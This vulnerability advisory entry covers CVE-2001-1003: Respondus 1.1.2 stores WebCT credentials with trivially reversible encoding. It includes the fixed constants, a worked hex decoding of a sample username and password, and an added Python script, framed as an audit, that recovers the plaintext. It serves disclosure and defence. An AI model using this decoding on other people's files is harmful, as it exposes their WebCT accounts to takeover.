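WebCT Respondus Password Disclosure and Privilege Escalation Vulnerability
Vulnerability ID | 1106474 | Vulnerability type | Unknown |
Published | 2001-08-23 | Updated | 2001-08-31 |
CVE ID | CVE-2001-1003 |
CNNVD-ID | CNNVD-200108-169 |
Platform | Multiple | CVSS score | 4.6 |
|Vulnerability source
|Vulnerability details
Respondus 1.1.2 for WebCT uses weak encryption when storing usernames and passwords. A local user who can read the WEBCT.SVR file can exploit this to decode them and gain additional privileges.
|Exploit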
source: http://www.securityfocus.com/bid/3228/info
Respondus is an application designed to add functionality to WebCT's quiz, self-test and survey tools. WebCT is a commercial e-learning solution.
When a user opts to have Respondus remember the username/password for WebCT access, the information is saved encrypted in a file called 'WEBCT.SRV'. To encrypt them, the characters of the username and password are converted to their ASCII values and added to a constant. A hex editor can be used to compare the file before credentials are saved with the file after credentials are saved. The username/password values are recovered by subtracting the constants present in 'WEBCT.SRV' before the credentials were saved from the new values.
The constants are the same for every version of Respondus and are easily located, which may allow an attacker who knows them to skip the step of comparing the old and new versions of 'WEBCT.SRV'.
Successful exploitation of this issue will allow the attacker to access other WebCT accounts, which may lead to elevated privileges or the disclosure of sensitive information.
C8-EF = userid
F0-117 = password
To see the password in plain text subtract the value shown in the WEBCT.SVR
file with no info saved from the value in the same position in the file
with the info saved. Stop when you reach the point where the values are
equal and the result is therefore 0.
i.e.
(the values after username is remembered:)
C8-EF 8B 88 7C 88 7A 7B 12 0D 13 0E 14 0F 15 10 16 11 17 12 11 13 12 14 13 15 14 16 15 17 16 0D 17 0E 11 0F 12 10 13 11 14 12
(the constants:)
C8-EF 16 15 17 16 11 17 12 0D 13 0E 14 0F 15 10 16 11 17 12 11 13 12 14 13 15 14 16 15 17 16 0D 17 0E 11 0F 12 10 13 11 14 12
75 73 65 72 69 64 0 <- stop
u s e r i d
(the values after the password is saved:)
F0-117 85 74 89 87 8E 84 83 7A 12 17 13 0D 14 0E 15 0F 16 10 17 11 11 12 12 13 13 14 14 15 15 16 16 17 17 0D 11 0E 12 0F 13 10
(the constants:)
F0-117 15 13 16 14 17 15 11 16 12 17 13 0D 14 0E 15 0F 16 10 17 11 11 12 12 13 13 14 14 15 15 16 16 17 17 0D 11 0E 12 0F 13 10
70 61 73 73 77 6F 72 64 0 <- stop
p a s s w o r d
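The subtraction walked through above, as an added Python example (not part of the original advisory) that an administrator could use to check whether a copy of the file holds remembered credentials. The hex rows are copied from the listing above; the names parse_row, recover_field and audit are hypothetical.

```python
# Added example: the four rows below are copied from the advisory's listing.
# parse_row, recover_field and audit are hypothetical helper names.
USERID_SAVED = "C8-EF 8B 88 7C 88 7A 7B 12 0D 13 0E 14 0F 15 10 16 11 17 12 11 13 12 14 13 15 14 16 15 17 16 0D 17 0E 11 0F 12 10 13 11 14 12"
USERID_CONST = "C8-EF 16 15 17 16 11 17 12 0D 13 0E 14 0F 15 10 16 11 17 12 11 13 12 14 13 15 14 16 15 17 16 0D 17 0E 11 0F 12 10 13 11 14 12"
PASSWD_SAVED = "F0-117 85 74 89 87 8E 84 83 7A 12 17 13 0D 14 0E 15 0F 16 10 17 11 11 12 12 13 13 14 14 15 15 16 16 17 17 0D 11 0E 12 0F 13 10"
PASSWD_CONST = "F0-117 15 13 16 14 17 15 11 16 12 17 13 0D 14 0E 15 0F 16 10 17 11 11 12 12 13 13 14 14 15 15 16 16 17 17 0D 11 0E 12 0F 13 10"

def parse_row(row):
    """Parse a 'START-END b0 b1 ...' row in the format the advisory prints."""
    span, *cells = row.split()
    start, end = (int(x, 16) for x in span.split("-"))
    data = bytes(int(c, 16) for c in cells)
    if len(data) != end - start + 1:
        raise ValueError(f"row {span}: expected {end - start + 1} bytes, got {len(data)}")
    return start, data

def recover_field(saved_row, const_row):
    """Subtract the constants from the saved bytes, stopping at the first 0."""
    s_off, saved = parse_row(saved_row)
    c_off, const = parse_row(const_row)
    if s_off != c_off or len(saved) != len(const):
        raise ValueError("rows do not cover the same offsets")
    out = []
    for s, c in zip(saved, const):
        diff = s - c
        if diff == 0:  # byte still equals the constant: end of the stored value
            break
        if not 0 < diff < 0x80:  # not ASCII: the constants do not match this file
            raise ValueError(f"unexpected difference {diff} at a stored byte")
        out.append(chr(diff))
    return "".join(out)  # a field that fills all 40 bytes simply ends with the row

def audit(fields):
    """Return {field name: number of stored characters}; 0 means nothing saved."""
    return {name: len(recover_field(saved, const))
            for name, (saved, const) in fields.items()}

if __name__ == "__main__":
    report = audit({"userid": (USERID_SAVED, USERID_CONST),
                    "password": (PASSWD_SAVED, PASSWD_CONST)})
    for name, count in report.items():
        print(f"{name}: {count} stored characters" if count else f"{name}: empty")
```

A non-zero count for either field means the remembered credentials in that copy of the file should be treated as readable by anyone who can open it.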
|Affected products
WebCT Respondus 1.1.2
|References
Source: BUGTRAQ
Name: 20010823 Respondus v1.1.2 stores passwords using weak encryption
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=99859557930285&w=2